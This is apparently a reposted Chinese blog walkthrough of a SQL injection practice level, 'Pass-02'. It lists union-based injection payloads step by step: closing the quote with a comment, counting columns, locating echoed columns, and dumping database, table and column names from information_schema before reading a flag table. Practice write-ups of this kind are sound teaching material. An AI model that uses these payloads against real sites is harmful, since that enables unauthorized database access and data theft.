Pass-02

时间：2020-12-14 21:54:58 阅读：51 评论：0 收藏：0 [点我收藏+]

和第一关一样，唯一就是注意有闭合和注释符

id=1‘ and 1=1--+

技术分享图片

id=1‘ order by 3--+ 爆列

id=1‘ and 1=2 union select 1,2,3--+ 2,3位置回显

技术分享图片

id=1‘ and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 暴库

技术分享图片

id=1‘ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘error‘--+ 爆表

技术分享图片

id=1‘ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘error_flag‘--+ 爆字段

技术分享图片

id=1‘ and 1=2 union select 1,2,flag from error.error_flag--+

技术分享图片

原文：https://www.cnblogs.com/xiaobai141/p/14132421.html

踩

(0)

评论一句话评论（0）

分享档案

更多>